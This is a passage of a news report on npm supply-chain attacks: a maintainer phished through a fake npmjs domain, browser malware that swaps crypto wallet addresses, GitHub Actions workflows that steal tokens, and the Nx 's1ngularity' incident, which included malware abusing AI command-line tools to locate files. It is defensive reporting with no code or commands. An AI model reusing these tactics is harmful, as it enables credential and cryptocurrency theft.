The email message Junon fell for came from an email address at support.npmjs.help, a domain created three days ago to mimic the official npmjs.com used by npm. It said Junon’s account would be closed unless he updated information related to his 2FA—which requires users to present a physical security key or supply a one-time passcode provided by an authenticator app in addition to a password when logging in.
According to an analysis from security firm Akido, the malicious code injects itself into the web browser of infected systems and begins monitoring for transfers involving ethereum, bitcoin, solana, tron, litecoin, and bitcoin cash currencies. When such transactions are detected, the infected packages would then replace the destination wallets with attacker-controlled addresses. The malware worked by hooking JavaScript functions, including fetch, XMLHttpRequest, and wallet APIs. Hooking gives code control over functions so they can be stopped or altered at certain execution points.
Word of the attack on the npm repositories came as two other supply-chain attacks took aim at other repositories that are influential in the open-source software ecosystem. One, disclosed Friday by security firm GitGuardians, compromised 3,325 authentication secrets for accounts on PyPI, npm, DockerHUB, GitHub, Cloudflare, and Amazon Web Servcies. In all, 327 GitHub users across 817 repositories were affected.
In the attack, compromised maintainer accounts pushed package updates that added malicious GitHub Actions workflows that extracted tokens and other sorts of authentication secrets. As of Friday, GitGuardian said, nine npm and 15 PyPI packages were at risk of compromise.
A separate supply-chain attack also hit users of GitHub last month, security firm Wiz reported last week. It targeted Nx, an open source build system and repository management tool used in enterprise settings. The initial compromise started after obtaining a valid authentication token to an npm account.
The malicious code extracted GitHub and npm tokens stored on compromised systems. It also abuses AI command-line interfaces to identify additional files that may be useful for accessing repositories of interest. A second phase of the attack used the compromised GitHub tokens to expose private repositories by making them public on the victims’ GitHub profiles. The pilfered credentials were uploaded to GitHub repositories that contained the name s1ngularity-repository, forming the basis for the name s1ngularity that Wiz has given to the incident.
